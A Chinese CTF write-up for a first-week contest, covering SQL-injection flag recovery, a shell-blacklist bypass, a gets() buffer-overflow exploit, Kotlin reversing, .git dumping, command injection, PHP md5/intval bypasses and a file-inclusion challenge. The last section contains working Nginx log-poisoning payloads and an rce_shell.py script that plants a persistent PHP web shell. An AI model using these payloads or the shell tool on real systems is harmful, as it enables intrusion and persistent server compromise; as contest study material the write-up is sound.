字符 5: UNICODE(...) + 10 >= 133 (即 UNICODE(...) >= 123) 为真，... >= 124 为假。ASCII码为 123，即 '{'。
16
字符 6: UNICODE(...) >= 56 为真，... >= 57 为假。ASCII码为 56，即 '8'。
17
字符 7: HEX(...) >= '31' 为真，... >= '32' 为假。十六进制为 0x31，即 '1'。
18
字符 8: UNICODE(...) >= 49 为真，... >= 50 为假。ASCII码为 49，即 '1'。
19
字符 9: UNICODE(...) >= 110 为真，... >= 111 为假。ASCII码为 110，即 'n'。
20
字符 10: UNICODE(...) >= 100 为真，... >= 101 为假。ASCII码为 100，即 'd'。
21
字符 11: HEX(...) >= '5F' 为真，... >= '60' 为假。十六进制为 0x5F，即 '_'。
22
字符 12: UNICODE(...) >= 53 为真，... >= 54 为假。ASCII码为 53，即 '5'。
23
字符 13: UNICODE(...) >= 113 为真，... >= 114 为假。ASCII码为 113，即 'q'。
24
字符 14: UNICODE(...) >= 49 为真，... >= 50 为假。ASCII码为 49，即 '1'。
25
字符 15: 4 + UNICODE(...) >= 99 (即 UNICODE(...) >= 95) 为真，... >= 96 为假。ASCII码为 95，即 '_'。
26
字符 16: UNICODE(...) >= 49 为真，... >= 50 为假。ASCII码为 49，即 '1'。
27
字符 17: UNICODE(...) >= 110 为真，... >= 111 为假。ASCII码为 110，即 'n'。
28
字符 18: UNICODE(...) >= 106 为真，... >= 107 为假。ASCII码为 106，即 'j'。
29
字符 19: UNICODE(...) >= 51 为真，... >= 52 为假。ASCII码为 51，即 '3'。
30
字符 20: UNICODE(...) >= 99 为真，... >= 100 为假。ASCII码为 99，即 'c'。
31
字符 21: UNICODE(...) >= 55 为真，... >= 56 为假。ASCII码为 55，即 '7'。
32
字符 22: HEX(...) >= '5F' 为真，... >= '60' 为假。十六进制为 0x5F，即 '_'。
33
字符 23: UNICODE(...) >= 52 为真，... >= 53 为假。ASCII码为 52，即 '4'。
34
字符 24: ... >= CHAR(110) 为真，... >= CHAR(111) 为假。ASCII码为 110，即 'n'。
35
字符 25: UNICODE(...) + 10 >= 62 (即 UNICODE(...) >= 52) 为真，... >= 53 为假。ASCII码为 52，即 '4'。
36
字符 26: UNICODE(...) >= 49 为真，... >= 50 为假。ASCII码为 49，即 '1'。
37
字符 27: HEX(...) >= '79' 为真，... >= '7A' 为假。十六进制为 0x79，即 'y'。
38
字符 28: UNICODE(...) >= 122 为真，... >= 123 为假。ASCII码为 122，即 'z'。
39
字符 29: UNICODE(...) >= 51 为真，... >= 52 为假。ASCII码为 51，即 '3'。
40
字符 30: UNICODE(...) >= 114 为真，... >= 115 为假。ASCII码为 114，即 'r'。
41
字符 31: HEX(...) >= '7D' 为真，... >= '7E' 为假。十六进制为 0x7D，即 '}'。
42

43
结论
44
将所有恢复的字符拼接起来，黑客获得的数据是：
45

46
flag{811nd_5q1_1nj3c7_4n41yz3r}

pwn#

[Week1] ncncnc#

1
(base) ➜  [Week1] ncncnc nc challenge.ilovectf.cn 30158
2
Welcome to ?ctf
3
ncncnc!!!
4
There are three stages ahead, keep going according to the hints
5
This is the first stage
6
Use the 'cat hint' command to open the hint file, which contains the key to the second stage
7
You can enter a command, or the key to proceed to the next stage
8
cat hint
9
Enter WoW to proceed to the second stage
10
WoW
11
You can enter a command, or the key to proceed to the next stage
12
Welcome to the second stage. This time I've added cat and hint to the blacklist. Do you have another way to open the hint to get the key to the third stage?
13
You can enter a command, or the key to proceed to the next stage
14
/bin'/s'h
15

16
ls
17
1
18
a
19
bin
20
dev
21
flag
22
hint
23
lib
24
lib64
25
od
26
pwn
27
cat flag
28
flag{63278607-3607-4f2f-8b53-f3b3db880b5c}

关键就这行/bin'/s'h，这个shell没有环境变量，导致一度以为是个假的…

[Week1] count#

1
#!/usr/bin/env python3
2
from pwn import *
3
import re
4
import sys
5
import time
6

7
HOST = "challenge.ilovectf.cn"
8
PORT = 30208
9
TIMEOUT = 6
10

11
hex_add_re = re.compile(rb'0x([0-9A-Fa-f]+)\s*\+\s*0x([0-9A-Fa-f]+)\s*=\s*\?')
12
mul_re = re.compile(rb'(?<![0-9A-Fa-f]x)(?<![0-9A-Fa-f]X)(\d+)\s*[xX]\s*(\d+)\s*=\s*\?')
13

14
# 更精确的 flag / success 检测
15
flag_pattern = re.compile(rb'flag\{[^}]{1,200}\}', re.I)      # 匹配 flag{...}
16
congrats_pattern = re.compile(rb'congrat', re.I)             # 匹配 congrat 或 congratulations
17
ignore_phrase = re.compile(rb'favorite\s+flag', re.I)        # 若为“favorite flag”这类说明性句子，忽略
18

19
def calc_hex_sum(a_hex_bytes, b_hex_bytes):
20
    a = int(a_hex_bytes.decode(), 16)
21
    b = int(b_hex_bytes.decode(), 16)
22
    s = a + b
23
    result = "0x{:x}".format(s).encode()
24
    log.info(f"calc_hex_sum: 0x{a_hex_bytes.decode()} + 0x{b_hex_bytes.decode()} = {result.decode()}")
25
    return result
26

27
def main():
28
    try:
29
        p = remote(HOST, PORT, timeout=TIMEOUT)
30
    except Exception as e:
31
        print(f"连接失败: {e}")
32
        sys.exit(1)
33

34
    buffer = b''
35
    try:
36
        while True:
37
            try:
38
                chunk = p.recv(timeout=TIMEOUT)
39
            except EOFError:
40
                log.info("远程主机关闭连接 (EOF).")
41
                break
42
            except Exception:
43
                chunk = b''
44

45
            if chunk:
46
                buffer += chunk
47
                sys.stdout.buffer.write(chunk)
48
                sys.stdout.buffer.flush()
49

50
            # 优先匹配十六进制题
51
            m_hex = hex_add_re.search(buffer)
52
            if m_hex:
53
                a_hex = m_hex.group(1)
54
                b_hex = m_hex.group(2)
55
                ans = calc_hex_sum(a_hex, b_hex)
56
                log.info(f"Hex question -> sending: {ans.decode()}")
57
                p.sendline(ans)
58
                buffer = buffer[m_hex.end():]
59
                continue
60

61
            # 再匹配乘法题
62
            m_mul = mul_re.search(buffer)
63
            if m_mul:
64
                a = m_mul.group(1).decode()
65
                b = m_mul.group(2).decode()
66
                val = int(a) * int(b)
67
                ans = str(val).encode()
68
                log.info(f"Detected multiplication {a}x{b}, sending: {ans.decode()}")
69
                p.sendline(ans)
70
                buffer = buffer[m_mul.end():]
71
                continue
72

73
            # 更稳健的 flag/success 检测：
74
            # 1) 先检测是否出现 flag{...}（最可靠）
75
            if flag_pattern.search(buffer):
76
                log.success("检测到 flag{...}，切换到交互模式。")
77
                break
78

79
            # 2) 再检测 congrat，但排除包含 'favorite flag' 的说明性句子
80
            if congrats_pattern.search(buffer) and not ignore_phrase.search(buffer):
81
                log.success("检测到 congrat(ulations) 类成功提示，切换到交互模式。")
82
                break
83

84
            # 否则不要因为单词 'flag' 就触发（避免误判）
85
            # 若 buffer 太大只保留尾部
86
            if not chunk:
87
                time.sleep(0.05)
88
                if len(buffer) > 8192:
89
                    buffer = buffer[-2048:]
90
                continue
91

92
    except KeyboardInterrupt:
93
        print("\n用户中断（Ctrl+C）")
94
    finally:
95
        try:
96
            p.interactive()
97
        except Exception:
98
            try:
99
                p.close()
100
            except Exception:
101
                pass
102

103
if __name__ == "__main__":
104
    main()

1
Congratulations on completing all challenges
2
[+] 检测到 congrat(ulations) 类成功提示，切换到交互模式。
3
[*] Switching to interactive mode
4
flag{0e5a67f3-f0a5-4f68-a20e-351575821f78}[*] Got EOF while reading in interactive

[Week1] 危险的 gets#

看一下字段（部分省略）

1
(base) ➜  [Week1] 危险的 gets strings 184750_danger_gets
2
/lib64/ld-linux-x86-64.so.2
3
__libc_start_main
4
gets
5
setvbuf
6
stdout
7
puts
8
system
9
stdin
10
stderr
11
printf
12
libc.so.6
13
GLIBC_2.2.5
14
GLIBC_2.34
15
__gmon_start__
16
PTE1
17
H=P@@
18
/bin/sh
19
plz input your name:
20
hello, %s!
21
you know ret addr
22
do you know rop?
23
do you know gets?
24
:*3$"
25
GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0
26
crt1.o
27
__abi_tag
28
_dl_relocate_static_pie
29
__bss_start
30
main
31
setvbuf@GLIBC_2.2.5
32
__TMC_END__
33
_init
34
stderr@GLIBC_2.2.5

1
(venv) root@iZbp1d5rltw6uhsn58zuoaZ:~/pwn# readelf -s ./184750_danger_gets | grep backdoor || objdump -d ./184750_danger_gets | sed -n '1,260p' | grep -n backdoor -n
2
    33: 00000000004011b6    26 FUNC    GLOBAL DEFAULT   15 backdoor

backdoor 00000000004011b6

1
(venv) root@iZbp1d5rltw6uhsn58zuoaZ:~/pwn# gdb -q ./184750_danger_gets
2
Reading symbols from ./184750_danger_gets...
3
(No debugging symbols found in ./184750_danger_gets)
4
(gdb) b *0x4011f7
5
Breakpoint 1 at 0x4011f7
6
(gdb) run
7
Starting program: /root/pwn/184750_danger_gets
8
[Thread debugging using libthread_db enabled]
9
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
10
you know ret addr
11
do you know rop?
12
do you know gets?
13
plz input your name:
14
Breakpoint 1, 0x00000000004011f7 in vulnerable_function ()
15
(gdb) info registers rbp
16
rbp            0x7fffffffe220      0x7fffffffe220
17
(gdb) p/x $rbp-0x40
18
$1 = 0x7fffffffe1e0

1
BUF_ADDR = $rbp - 0x40
2
SAVED_RIP_ADDR = $rbp + 8
3
offset = SAVED_RIP_ADDR - BUF_ADDR = ($rbp + 8) - ($rbp - 0x40) = 0x48 = 72

1
from pwn import *
2

3
BINARY = './184750_danger_gets'
4
elf = ELF(BINARY)
5
offset = 72
6

7
backdoor = 0x4011b6
8

9
p = process(BINARY)
10
#p = remote('challenge.ilovectf.cn', 30254)
11

12
payload = b'A'*offset
13
payload += p64(backdoor)
14

15
p.sendline(payload)
16
p.interactive()

服了，为啥呀，本地可以过，remote就EOF。。。

reverse#

[Week1] jvav#

觉得Main很史可以直接去看加密

jadx打开，MainActivityKt确实史，直接看EncKt，wait，你package com.utilis.enc;这么写它规范嘛？？

不管了，jadx反编译的还是很适合肉眼观察的。流程如下：

1
checker(input) ->
2
    encoder(input) ->
3
        confuser(...) ->
4
            rounder(...)

1
#!/usr/bin/env python3
2
import base64
3
import binascii
4

5
# 原始 Java bArr（signed bytes）
6
bArr_signed = [-89, 96, 102, 118, -89, -122, 103, -103, -125, -95,
7
               114, 117, -116, -102, 114, -115, -125, 108, 110, 118,
8
               -91, -83, 101, -115, -116, -114, 124, 114, -123, -87,
9
               -87, -114, 121, 108, 124, -114]
10

11
# 把 Java 的 signed byte 转为 0..255 unsigned 表示
12
bArr = [x & 0xff for x in bArr_signed]
13
n = len(bArr)
14

15
# 1) rounder 的逆向：rounder 是 output[i] = input[(i+5) % len]
16
#    因此原来的 input = left-rotate by 5: input[i] = output[(i+5)%n]
17
rounder_inv = [bArr[(i + 5) % n] for i in range(n)]
18

19
# 2) confuser 的逆向
20
#    forward: y = (~((a + 32) ^ 11)) & 0xff
21
#    reverse: u = (~y) & 0xff
22
#             t = u ^ 11
23
#             a = (t - 32) & 0xff
24
confuser_inv = []
25
for y in rounder_inv:
26
    u = (~y) & 0xff
27
    t = u ^ 11
28
    a = (t - 32) & 0xff
29
    confuser_inv.append(a)
30

31
# confuser_inv 此时应为 encoder 输出的 Base64 bytes
32
encoded_bytes = bytes(confuser_inv)
33

34

35
# 最后按 UTF-8 解码为字符串
36
try:
37
    flag = encoded_bytes.decode('utf-8')
38
except UnicodeDecodeError:
39
    # 若发生编码错误，显示原始 bytes 以便调试
40
    flag = None
41
    print("Warning: decoded bytes are not valid UTF-8. raw bytes:", encoded_bytes)
42

43
print("Recovered flag:", flag)

1
输出
2
Recovered flag: RsMW5faXNfYWxzb19qYXZhfQ==ZmxhZ3trb3
3
但实际上应该是：ZmxhZ3trb3RsMW5faXNfYWxzb19qYXZhfQ==
4
解码后为：flag{kotl1n_is_also_java}
5
蒜鸟蒜鸟，就这样吧

Web#

[Week1] Gitttttttt#

提示.git，那么尝试把.git下载下来

1
git-dumper http://challenge.ilovectf.cn:30024/.git/ .

结果如下

1
➜  repo ls -a .git
2
.           config      HEAD        index       objects
3
..          description hooks       info

看结构，是完整的git，但我重组失败啊%%

1
➜  repo cat .git/HEAD
2
ref: refs/heads/master

好的，是master 观察git-dumper日志：

1
[-] Fetching http://challenge.ilovectf.cn:30024/.git/objects/3f/0aa7170cdb17191ec7cb6e6fe976d8d126e50b [200] [-] Fetching http://challenge.ilovectf.cn:30024/.git/objects/70/7d88d95558346d96797ab00a24daa0053078fc [200]

那么重点关注这两个hash tag

1
➜  repo git --git-dir=.git cat-file -t 3f0aa7170cdb17191ec7cb6e6fe976d8d126e50b
2
git --git-dir=.git cat-file -t 707d88d95558346d96797ab00a24daa0053078fc
3

4
致命错误：不是 git 仓库：'.git'
5
致命错误：不是 git 仓库：'.git'

受不了了哥们，别搞。 git是废了，直接读数据吧

1
import zlib, sys, pathlib
2

3
for sha in [
4
    "3f0aa7170cdb17191ec7cb6e6fe976d8d126e50b",
5
    "707d88d95558346d96797ab00a24daa0053078fc"
6
]:
7
    path = pathlib.Path(".git/objects") / sha[:2] / sha[2:]
8
    data = zlib.decompress(path.read_bytes())
9
    print(f"\n===== {sha} =====")
10
    print(data.decode("utf-8", errors="replace"))

结果如下

1
(省略前一个，真的只是普通commit)
2
===== 707d88d95558346d96797ab00a24daa0053078fc =====
3
blob 39flag{#h_I_NE2V0R_13v3o_71E_6Bi7_4BGAzN}

[Week1] Ping??#

这个简单，拼接命令

1
& cat f*

过滤了flag.txt字符串，用*就能绕过

1
flag{2926a603-a382-4477-a70a-c3195eaafcbc}

[Week1] from_http#

这类题目真的烦人😡搞个断点先断点啊先改UA，再Get，再Post，再再再。。。不写了，烦死我了，反正七八轮后能拿flag。

[Week1] secret of php#

嗯，东西下载下来了，还Dockerfile，真是贴心呢～

1
➜  secret of php ls
2
Dockerfile flag.php   Flll4g.php index.php

需要进入yes yes的情况

1
<?php
2
highlight_file(__FILE__);
3
include("flag.php");
4
$a = $_GET['a'];
5

6
if (isset($a)){
7
    if($a === "2025") {
8
        die("no");
9
    } else {
10
        echo "<br>"."yes"."<br>";
11
    }
12
    if(intval($a,0) === 2025) {
13
        echo "yes yes"."<br>";
14
        echo "Congratulations! You have passed the first level, the next level is ".$path."<br>";
15
    } else {
16
        die("no no");
17
    }
18
} else {
19
    echo "a is not set"."<br>";
20
}

isset($a) 为真（传个参数a）
严格比较 ($a === “2025”) 必须为假
intval($a, 0) === 2025 必须为真（把a转成整数后等于 2025）。

intval($a,0) 会从字符串开头解析出整数部分（第二个参数 0 允许根据前缀自动判断进制），所以只要a的开头数字部分是 2025，但整个字符串不是精确等于”2025”，就能满足三个条件。

1
http://challenge.ilovectf.cn:30070/?a=2025abc

得到

1
yes
2
yes yes
3
Congratulations! You have passed the first level, the next level is /Flll4g.php

~~布什戈么，那你干脆别放那个网盘得了~~

1
<?php
2
highlight_file(__FILE__);
3
include('flag.php');
4
$a = $_POST['a'];
5
$b = $_POST['b'];
6

7
if (isset($a) && isset($b)){
8
    if ($a !== $b && md5($a) == md5($b)){
9
        echo "<br>yes<br>";
10
    } else {
11
        die("no");
12
    }
13
    $a = $_REQUEST['aa'];
14
    $b = $_REQUEST['bb'];
15
    if ($a !== $b && md5((string)$a) === md5((string)$b)){
16
        echo "yes yes<br>";
17
    } else {
18
        die("no no");
19
    }
20
    $a = $_REQUEST['aaa'];
21
    $b = $_REQUEST['bbb'];
22
    if ((string)$a !== (string)$b && md5((string)$a) === md5((string)$b)){
23
        echo "yes yes yes<br>";
24
        echo "Congratulations! You have passed the second level, the flag is ".$flag."<br>";
25
    } else {
26
        die("no no no");
27
    }
28
} else {
29
    echo "a or b is not set<br>";
30
}

有aa有bb，乍眼一看要md5对撞了，上网搜一对

1
curl -v -X POST 'http://challenge.ilovectf.cn:30070/Flll4g.php' \
2
  -F 'a[]=1' -F 'b[]=2' \
3
  -F 'aa[]=1' -F 'bb[]=2' \
4
  -F 'aaa=TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak' \
5
  -F 'bbb=TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak'

来自GPT的解析:

第一层：a、b 作为不同的数组（a[]=1、b[]=2），使得 $a !==$ b 为真，而 md5( $a) 与 md5($ b) 都返回 NULL（相等）。

第二层：aa、bb 也作为数组，(string) $array 都变成 "Array"，所以 md5((string)$ a) === md5((string)$b) 为真（严格等）。

第三层：aaa、bbb 使用两段不同但 MD5 相同的字符串（示例来自上面的链接），满足 (string) $a !== (string)$ b 且 md5((string) $a) === md5((string)$ b)。

[Week1] 前端小游戏#

照理说，这题该写console脚本，直接改数据。但一想这纯静态网页，哪里藏得住东西呀，看了一眼js，哦吼？

1
if (score >= 30) {
2
    endTitle.textContent = '任务完成？';
3
    endMessage.textContent = '骗你的，30分也不给你flag!';
4
} else if (score < 0) {
5
    endTitle.textContent = '异常结果';
6
    endMessage.textContent = '检测到异常分数，获取到以下数据：';
7
    Element.textContent = atob('ZmxhZ3s0ZjFjNTRmZS02ZmNlLTQxNTAtYWM0Mi02MTFmNzk4MjA0Njd9');
8
    Container.classList.remove('hidden');
9
} else {
10
    endTitle.textContent = '挑战失败';
11
    endMessage.textContent = `你只捕获了 ${score} 个黑客，至少需要30个！`;
12
}

ZmxhZ3s0ZjFjNTRmZS02ZmNlLTQxNTAtYWM0Mi02MTFmNzk4MjA0Njd9 deBase64 -> flag{4f1c54fe-6fce-4150-ac42-611f79820467}

(review：我真的手点到了30个，他喵的)

[Week1] 包含不明东西的食物？！#

将物品投入锅里即可收获神秘礼品😋 这题其实不难，但我想复杂了。算上我php基础并不扎实，做这题时有点难受。

Ok请输入食材名（如food1.webp）,那肯定先输入food1.webp试试看。发现报错如下：

1
食材路径：/var/www/html/backpack/food1.webp
2

3

4
Warning: Unexpected character in input: '' (ASCII=26) state=0 in /var/www/html/backpack/food1.webp on line 618
5

6
Warning: Unexpected character in input: '' (ASCII=28) state=0 in /var/www/html/backpack/food1.webp on line 618
7

8
Parse error: in /var/www/html/backpack/food1.webp on line 618

布什戈么，这是吧webp当php了啊？当时甚至试过了php://filter，不过这题单纯是字符串拼接。

尝试绝对路径，提示/var/www/html/backpack//var/www/html/backpack/food1.webp 食材不存在，真的就是拼接术。无奈，翻html，发现hint：

1
            <!--flag在flag.txt中-->
2
            <!--大厨会include你输入的内容哦~-->

这时候我开始瞎试了，../flag.txt ../../flag.txt ../../../flag.txt ../../../../flag.txt 我超！

恭喜！你领悟了魔物饭的美味之处，这是你的奖励 flag{4b88e9f5-756f-4b2d-9081-0f1f4e0124ca}

复盘：#

尝试了../../../../var/www/html/backpack/php://filter/read=convert.base64-encode/resource=food1.webp和../../../../php://filter/read=convert.base64-encode/resource=/var/www/html/backpack/food1.webp，都不行啊。

有意思，使用payload../../../../etc/passwd真的有权限读取诶:

1
root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/bin/sh man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin www-data:x:1000:1000:Linux User,,,:/home/www-data:/bin/false nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin

坏了，突然想玩RCE了 :~D 只能读的话，应该可以Log Poisoning吧

../../../../etc/nginx/nginx.conf 返回值重点关注access_log /var/log/nginx/access.log main;构造payload../../../../var/log/nginx/access.log

../../../../etc/issue返回Welcome to Alpine Linux 3.8 Kernel \r on an \m (\l)

../../../../etc/hosts返回# Kubernetes-managed hosts file. 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet fe00::0 ip6-mcastprefix fe00::1 ip6-allnodes fe00::2 ip6-allrouters 10.233.66.35 cl-55-c98351f013ba2a8a原来是k8s呀。

第一次尝试:

1
curl -i -s -k -X 'GET' \
2
-H 'User-Agent: <?php system($_GET["cmd"]); ?>' \
3
'http://challenge.ilovectf.cn:30076/index.html

看日志发现Fatal error: Undefined constant 'x22cmd\x22' in /var/log/nginx/access.log on line 61 然后好像什么玩意崩了，再次使用../../../../var/log/nginx/access.logpayload直接返回了数据，没有html、css了，诶，我重启一下。

第二次尝试：

1
curl -i -s -k -X 'GET' \
2
-H 'User-Agent: <?php eval(base64_decode("c3lzdGVtKCRfR0VUW2NtZF0pOw==")); ?>' \
3
'http://challenge.ilovectf.cn:30081/index.html'

又崩了Fatal error: Undefined constant 'x22c3lzdGVtKCRfR0VUW2NtZF0pOw' in /var/log/nginx/access.log on line 13

第三次尝试:

1
curl -i -s -k -X 'GET' \
2
-H 'User-Agent: <?php //system($_GET[cmd]);exit;?>' \
3
'http://challenge.ilovectf.cn:30082/index.html'

这次不报错了,但也没什么反应

第四次尝试:

1
curl -i -s -k -X 'GET' \
2
-H 'User-Agent: *)/<?php eval(base64_decode(c3lzdGVtKCRfR0VUW2NtZF0pOw)); exit; ?>/*' \
3
'http://challenge.ilovectf.cn:30084/index.html'

1
curl -i -s -k -X 'POST' \
2
-d 'filename=../../../../var/log/nginx/access.log' \
3
'http://challenge.ilovectf.cn:30084/include.php?cmd=cat%20/flag.txt'

卧槽！ RCE！

拿到php了

1
<?php
2
error_reporting(E_ALL);
3
ini_set('display_errors', 1);
4

5
$uploadDir = __DIR__ . '/backpack';
6
if (!is_dir($uploadDir)) {
7
    mkdir($uploadDir, 0777, true);
8
}
9

10
$resultMsg = '';
11
$includeOutput = '';
12

13
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['filename'])) {
14
    $filename = trim($_POST['filename']);
15

16
    $targetPath = $uploadDir . '/'.$filename;
17

18
    if (file_exists($targetPath) && is_file($targetPath)) {
19

20
        $ext = strtolower(pathinfo($targetPath, PATHINFO_EXTENSION));
21

22
        echo "<p>食材路径：<strong>" . htmlspecialchars($targetPath) . "</strong></p>";
23
        echo "<hr>";
24

25
        if($ext === 'jpg')
26
            echo "<img src='backpack/" . rawurlencode($filename) . "' alt='图片' style='max-width:100%;'>";
27
        else{
28
        ob_start();
29
        include $targetPath;
30
        $includeOutput = ob_get_clean();}
31
    } else {
32
        $resultMsg = "<p>" . htmlspecialchars($targetPath) . " 食材不存在</p>";
33
    }
34
} else {
35
    $resultMsg = "<p>请通过表单提交食材路径</p>";
36
}
37

38

39

40

41

42
?>
43
<!DOCTYPE html>
44
<html lang="zh-CN">
45
<head>
46
    <meta charset="UTF-8" />
47
    <title>烹饪结果 - 迷宫食堂</title>
48
    <style>
49
        html, body {
50
            height: 100%;
51
            margin: 0;
52
        }
53
        body {
54
            background: url('./backgroud.webp') no-repeat center center fixed;
55
            background-size: cover;
56
            font-family: Arial, sans-serif;
57
            color: white;
58
            display: flex;
59
            justify-content: center;
60
            align-items: center;
61
            padding: 20px;
62
            flex-direction: column;
63
            text-align: center;
64
        }
65
        .result-box {
66
            background: rgba(0,0,0,0.5);
67
            padding: 20px;
68
            border-radius: 10px;
69
            max-width: 800px;
70
            width: 90%;
71
            max-height: 80vh;
72
            overflow-y: auto;
73
            word-break: break-word;
74
            text-align: left;
75
        }
76
        a {
77
            color: #aaf;
78
        }
79
    </style>
80
</head>
81
<body>
82
<div class="result-box">
83
    <p><a href="index.html">返回投入食材页面</a></p>
84
    <?php
85
    echo $resultMsg;
86
    echo $includeOutput;
87
    ?>
88
</div>
89
</body>
90
</html>

1
curl -i -s -k -X 'POST' \
2
-d 'filename=../../../../var/log/nginx/access.log' \
3
'http://challenge.ilovectf.cn:30082/include.php?cmd=base64%20/var/www/html/backpack/food1.webp' > aaa.txt

好的终于拿到food1.webp了🤣就是麻烦了点。。。

rce_shell.py

1
import requests
2
import sys
3
import re
4
import urllib.parse
5
# 禁用 requests 的 SSL 警告
6
requests.packages.urllib3.disable_warnings()
7

8
# --- RCE 配置 ---
9
POISON_PAYLOAD = '*)/<?php eval(base64_decode("c3lzdGVtKCRfR0VUW2NtZF0pOw==")); exit; ?>/*'
10
LOG_PATH = '../../../../var/log/nginx/access.log'
11
INCLUDE_SCRIPT = '/include.php'
12
POISON_PATH = '/index.html'
13

14
WEBSHELL_INJECTION_CMD = f"echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/backpack/shell.php"
15
# -----------------
16

17
def poison_log(base_url):
18
    """发送 GET 请求，将恶意代码注入到 Nginx 日志中"""
19
    poison_url = base_url + POISON_PATH
20
    headers = {'User-Agent': POISON_PAYLOAD}
21

22
    try:
23
        print(f"[+] 正在向 {poison_url} 注入恶意 User-Agent...")
24
        requests.get(poison_url, headers=headers, verify=False, timeout=5)
25
        print("[+] 注入成功。开始尝试 RCE...")
26
    except requests.exceptions.RequestException as e:
27
        print(f"[-] 投毒请求失败: {e}")
28
        sys.exit(1)
29

30
def log_rce_execute(base_url, command):
31
    """使用日志投毒链执行命令 (第一次使用)"""
32
    rce_url = base_url + INCLUDE_SCRIPT
33
    data = {'filename': LOG_PATH}
34
    # 必须对命令进行URL编码，以确保特殊字符安全
35
    params = {'cmd': command}
36

37
    try:
38
        response = requests.post(rce_url, data=data, params=params, verify=False, timeout=10)
39
        content = response.text
40

41
        # 核心过滤逻辑
42
        notice_end_marker_re = re.compile(r"<b>Notice</b>.*on line <b>\d+</b><br />", re.DOTALL)
43
        match = notice_end_marker_re.search(content)
44

45
        if match:
46
            output_start = match.end()
47
            rce_output = content[output_start:]
48
            rce_output = re.sub(r'^(<br\s*/>|<br>|\s)*', '', rce_output)
49
            rce_output = re.sub(r'</?\s*\w+\s*>', '', rce_output).strip()
50
            return rce_output
51
        else:
52
            # 简化过滤，移除大部分 HTML 标签
53
            rce_output = re.sub(r'<[^>]*>', '', content)
54
            rce_output = re.sub(r'.*Use of undefined constant.*', '', rce_output, flags=re.DOTALL)
55
            rce_output = rce_output.strip()
56
            return rce_output
57

58
    except requests.exceptions.RequestException as e:
59
        return f"[-] RCE 执行失败: {e}"
60

61
def webshell_execute(base_url, command):
62
    """使用植入的Web Shell执行命令 (持久化模式)"""
63
    shell_url = f"{base_url}/backpack/shell.php"
64
    params = {'c': command} # 使用 'c' 作为命令参数
65

66
    try:
67
        # 使用 GET 请求执行命令
68
        response = requests.get(shell_url, params=params, verify=False, timeout=10)
69
        return response.text.strip()
70
    except requests.exceptions.RequestException as e:
71
        return f"[-] Web Shell 连接失败或命令执行失败: {e}"
72

73

74
def main():
75
    if len(sys.argv) != 2:
76
        print("用法: python rce_shell.py <域名或IP>:<端口>")
77
        sys.exit(1)
78

79
    target_host = sys.argv[1]
80
    base_url = f"http://{target_host}"
81

82
    # --- 模式选择 ---
83
    print("\n请选择 RCE 模式:")
84
    print("1. Log Poisoning Shell (每次执行命令都包含日志文件)")
85
    print(f"2. Web Shell 模式 (投毒一次，植入 shell.php 后，通过它持久访问) - 推荐")
86
    choice = input("输入模式编号 (默认为 2): ")
87

88
    use_webshell = choice not in ['1', 'log', 'poison']
89

90
    # 步骤 1: 投毒
91
    poison_log(base_url)
92

93
    if use_webshell:
94
        # 步骤 2a: 植入 Web Shell
95
        print(f"[+] 正在植入 Web Shell: shell.php...")
96

97
        # 编码植入命令
98
        encoded_injection_cmd = urllib.parse.quote(WEBSHELL_INJECTION_CMD)
99

100
        injection_result = log_rce_execute(base_url, encoded_injection_cmd)
101

102
        # 检查是否成功植入 (成功的 echo 命令通常返回空字符串)
103
        if injection_result.strip():
104
            print(f"[-] Web Shell 植入失败。RCE输出: {injection_result}. 切换回 Log Poisoning 模式。")
105
            use_webshell = False
106
        else:
107
            print(f"[+] Web Shell 植入成功! 访问点: {base_url}/backpack/shell.php")
108

109
    # 步骤 3: 交互式 Shell 启动
110
    print("\n" + ("="*50))
111
    print("[+] 交互式 Shell 启动。输入 'exit' 或 'quit' 退出。")
112
    print("[!] 如果方向键出现 '^[[A' 等乱码，请在退出后执行 'stty sane' 修复终端。")
113
    print(("="*50) + "\n")
114

115
    executor = webshell_execute if use_webshell else log_rce_execute
116

117
    # 第一次执行 whoami，验证是否成功
118
    print(f"[+] 尝试执行 'whoami'...")
119
    initial_output = executor(base_url, 'whoami')
120
    print(initial_output)
121

122
    if "404 Not Found" in initial_output or "Parse error" in initial_output or not initial_output:
123
        print("[-] RCE 验证失败。请检查路径或权限。")
124
        return
125

126
    while True:
127
        try:
128
            cmd = input("$ ")
129
            if cmd.lower() in ['exit', 'quit']:
130
                break
131
            if not cmd:
132
                continue
133

134
            output = executor(base_url, cmd)
135
            print(output)
136

137
        except KeyboardInterrupt:
138
            print("\n[+] 退出 Shell。")
139
